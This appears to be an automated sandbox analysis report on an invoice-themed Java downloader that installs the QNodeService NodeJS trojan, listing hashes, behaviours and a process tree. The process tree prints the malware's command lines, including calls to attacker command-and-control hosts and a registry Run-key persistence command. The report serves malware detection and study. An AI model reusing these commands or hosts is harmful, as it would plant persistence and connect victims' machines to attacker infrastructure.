Analysis
-
max time kernel
120s -
max time network
152s -
platform
windows10_x64 -
resource
win10 -
submitted
22-07-2020 09:20
Static task
static1
Behavioral task
behavioral1
Sample
Invoice FVF-33620200711 Payment confirmation.jar
Resource
win7
Behavioral task
behavioral2
Sample
Invoice FVF-33620200711 Payment confirmation.jar
Resource
win10
General
-
Target
Invoice FVF-33620200711 Payment confirmation.jar
-
Size
12KB
-
MD5
5ad9084d4c1eb71401e72628e5f6c0be
-
SHA1
0487680ad4c77db95ffd7178c790a5f0c0ebf2b7
-
SHA256
1ed58cab0503e46cb79ba34561c543135dab8969d7d82685573797699a0b7b7d
-
SHA512
2500f55d3419067b61f0f53d7ca8e04b22c109c6c81bea2281371467b171f66168eb9723f713152b294d651955df2cb0267bb42ec6ead5573864c5e515800d59
Malware Config
Signatures
-
QNodeService NodeJS Trojan 1 IoCs
resource yara_rule behavioral2/files/0x000100000001bfff-117.dat family_qnodeservice -
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Windows\CurrentVersion\Run\qnodejs-ed6ef9e2 = "cmd /D /C \"C:\\Users\\Admin\\qnodejs-node-v13.13.0-win-x64\\qnodejs\\qnodejs-ed6ef9e2.cmd\"" reg.exe -
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString node.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString node.exe -
Loads dropped DLL 4 IoCs
pid Process 1836 node.exe 1836 node.exe 1836 node.exe 1836 node.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 1836 node.exe 1836 node.exe -
JavaScript code in executable 2 IoCs
resource yara_rule behavioral2/files/0x000100000001adbe-115.dat js behavioral2/files/0x000100000001adbe-121.dat js -
QNodeService
is a trojan written in NodeJS and spread via Java downloader. Utilizes stealer functionality.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 10 wtfismyip.com 11 wtfismyip.com -
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 3820 wrote to memory of 1092 3820 java.exe 68 PID 3820 wrote to memory of 1092 3820 java.exe 68 PID 1092 wrote to memory of 1500 1092 node.exe 69 PID 1092 wrote to memory of 1500 1092 node.exe 69 PID 1500 wrote to memory of 1648 1500 cmd.exe 70 PID 1500 wrote to memory of 1648 1500 cmd.exe 70 PID 1092 wrote to memory of 1836 1092 node.exe 71 PID 1092 wrote to memory of 1836 1092 node.exe 71 -
Executes dropped EXE 2 IoCs
pid Process 1092 node.exe 1836 node.exe
Processes
-
C:\ProgramData\Oracle\Java\javapath\java.exejava -jar "C:\Users\Admin\AppData\Local\Temp\Invoice FVF-33620200711 Payment confirmation.jar"1⤵
- Suspicious use of WriteProcessMemory
PID:3820 -
C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\node.exeC:\Users\Admin\qnodejs-node-v13.13.0-win-x64\node.exe C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\qnodejs\wizard.js start --group user:[email protected] --register-startup --central-base-url https://wps.chickenkiller.com --central-base-url https://wpsq.ddnsfree.com2⤵
- Suspicious use of WriteProcessMemory
- Executes dropped EXE
PID:1092 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "qnodejs-ed6ef9e2" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\qnodejs\qnodejs-ed6ef9e2.cmd\"""3⤵
- Suspicious use of WriteProcessMemory
PID:1500 -
C:\Windows\system32\reg.exeREG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "qnodejs-ed6ef9e2" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\qnodejs\qnodejs-ed6ef9e2.cmd\""4⤵
- Adds Run key to start application
PID:1648
-
-
-
C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\node.exeC:\Users\Admin\qnodejs-node-v13.13.0-win-x64\node.exe C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\qnodejs\qnodejs-win32-x64.js serve start --group user:[email protected] --register-startup --central-base-url https://wps.chickenkiller.com --central-base-url https://wpsq.ddnsfree.com3⤵
- Checks processor information in registry
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Executes dropped EXE
PID:1836
-
-